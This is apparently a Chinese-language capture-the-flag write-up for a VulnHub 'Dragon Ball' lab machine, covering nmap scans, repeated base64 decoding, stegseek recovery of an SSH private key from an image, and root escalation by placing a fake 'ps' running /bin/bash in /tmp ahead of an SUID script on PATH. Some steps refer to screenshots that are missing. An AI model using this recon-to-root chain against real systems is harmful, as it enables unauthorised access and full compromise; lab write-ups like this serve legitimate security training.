信息收集
# nmap -sn 192.168.56.0/24 -oN live.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:52 CST
Nmap scan report for 192.168.56.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.56.132
Host is up (0.00010s latency).
MAC Address: 00:0C:29:FB:90:3A (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.0011s latency).
MAC Address: 00:50:56:E8:10:E3 (VMware)
Nmap scan report for 192.168.56.130
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds
探测到目标靶机的IP地址为192.168.56.132
# nmap -sT --min-rate 10000 -p- 192.168.56.132 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:53 CST
Nmap scan report for 192.168.56.132
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:FB:90:3A (VMware)
端口信息探测到目标靶机仅开放端口22 和 80两个端口!
# nmap -sT -sC -sV -O -p22,80 192.168.56.132 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:54 CST
Nmap scan report for 192.168.56.132
Host is up (0.0031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b5:77:4c:88:d7:27:54:1c:56:1d:48:d9:a4:1e:28:91 (RSA)
| 256 c6:a8:c8:9e:ed:0d:67:1f:ae:ad:6b:d5:dd:f1:57:a1 (ECDSA)
|_ 256 fa:a9:b0:e3:06:2b:92:63:ba:11:2f:94:d6:31:90:b2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: DRAGON BALL | Aj's
MAC Address: 00:0C:29:FB:90:3A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.5 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.66 seconds
详细信息的探测:22端口上是openssh 7.9 80端口上为apache开启的http服务 版本为2.4.38 存在一个title但是没有其他的详细信息了!
# nmap -sT --script=vuln -p22,80 192.168.56.132 -oN vuls.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:54 CST
Nmap scan report for 192.168.56.132
Host is up (0.00038s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:FB:90:3A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.24 seconds
默认漏洞脚本的信息探测显示存在一个robots文件,但是似乎也没什么其他的重要敏感信息!既然仅存在22和80俩个端口,那么我们将重点放在80端口上!
寻找立足点
80端口上看到了很多七龙珠的信息!robots文件中看到了疑似base64编码的字符串!
尝试解码:
‘
似乎存在隐藏的目录,但是我们并不知道隐藏的目录是什么!尝试进行目录扫描:
这里用了两个工具,同时还用了不同的字典,但是似乎没有找到隐藏的目录:
you find the hidden dir 似乎告诉我们找到了隐藏目录,不会就是robots文件本身吧?似乎没什么用啊!尝试回到主页进行翻译:
(大概翻译了一下主页中所有的英文,似乎和整个靶机看起来并不是很相关!主页中存在三张图片!尝试下载下来看一下是不是存在隐写!)
哎!等会!发现了一点点不对的地方,首页查看源码的时候,又发现了疑似base64的东西:
尝试再次解码:
经过了三次base64的解码,发现了主题词 DRAGON BALL! 这是啥?不会是目录啥的?
真的是目录,本来还想着去看看三张图片的信息,但是三张图片的信息,并不是靶机上的资源,所以这里我判断可能也不会存在隐写的信息!(当然了这只是猜测,后续没什么突破的话 还是要看一下的!)
整体上看了一下secret文件中的内容和vulnhub中的信息:
secret中的信息是一些目录!一会可以利用目录扫描工具,进行扫描!
vulnhub目录下面存在着一张图片和一个登录的html页面:
先扫了一下目录,但是似乎看起来没有存在的目录信息:
login.html页面还是纯静态的!没啥用啊!
这个源码中似乎也没什么东西!还有一张图片了就,尝试下载下来看看里面是不是存在隐写吧,似乎没有其他的路可以走了!
这里我给四张图片(包括了前面看到的三张图片,全部都下载下来了!)看了一下是否存在隐写信息,看起来也没什么东西啊:
后面找到了stegseek工具,发现aj图片中存在隐写信息:
找到了密码字段为love 存在原始文件id_rsa! 尝试提取出这个文件!
发现提取出来的文件是 私钥文件! 尝试给予权限:
因为在login.html页面看到了用户名为xmen! 尝试利用私钥进行连接!
连接成功之后,建立了初始立足点!尝试进行提权!
提权
确定目标靶机的ip地址,并不是docker环境!尝试提权,查看/etc/passwd文件:
还存在一个用户名为cyber!
当前目录下面存在一个flag文件!发现当前用户的目录下面存在一个目录为script,里面存在两个文件,但是这个两个文件的权限,都是root,其他用户的权限只有执行和读的权限:
看到了demo文件中的内容是设置了组id和用户id!似乎没有修改的权限!查看了sudo权限,当然我们没有密码,看不到,同时还看了一下suid文件:
尝试去看了家目录,但是发现并没有刚才看到cyber用户!
既然上面的shell具有suid权限,那么我们可以尝试重写一个ps等!在tmp目录下面重写ps!写入/bin/bash!
echo '/bin/bash' > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
之后执行shell进行提权:
最终提权成功!